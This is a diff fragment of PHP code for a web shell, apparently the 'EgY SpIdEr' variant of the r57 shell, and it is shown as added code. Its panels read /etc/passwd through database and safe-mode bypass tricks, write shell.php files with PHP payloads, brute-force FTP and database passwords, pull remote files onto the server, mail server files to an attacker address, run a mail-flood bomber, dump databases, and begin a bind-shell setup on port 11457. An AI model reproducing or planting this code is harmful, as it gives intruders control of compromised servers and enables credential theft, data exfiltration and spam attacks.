+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test19_md',15,(!empty($_POST['test19_md'])?($_POST['test19_md']):("mysqli"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test19_ml',15,(!empty($_POST['test19_ml'])?($_POST['test19_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text39'].$arrow."</b>".in('text','test19_mp',15,(!empty($_POST['test19_mp'])?($_POST['test19_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test19_port',15,(!empty($_POST['test19_port'])?($_POST['test19_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test19_file',96,(!empty($_POST['test19_file'])?($_POST['test19_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test19').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text170'],'id2221').$table_up2.div('id2221').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','egy_4_2_0',96,(!empty($_POST['egy_4_2_0'])?($_POST['egy_4_2_0']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_4_2_0').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
+"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
+"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
+echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up3.div('id27').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;  
+}
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;  
+}
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;  
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text171'],'id98200').$table_up2.div('id98200').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_5_2_3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+{
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
+echo "<tr><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
+echo $te."</td><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
+echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
+ echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+ echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+ echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+
+
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from egy spider shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
+echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
+if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
+if($pg_on)    $select .= '<option value=PostgreSQL>PostgreSQL</option>';
+if($ora_on)   $select .= '<option value=Oracle>Oracle</option>';
+if($mysqli_on)   $select .= '<option value=MySQLi>MySQLi</option>';
+if($msql_on)   $select .= '<option value=mSQL>mSQL</option>';
+if($sqlite_on)   $select .= '<option value=SQLite>SQLite</option>';
+$select .= '</select>';
+
+
+echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up3.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
+
+
+echo "</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text81'],'id555555').$table_up2.div('id555555').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
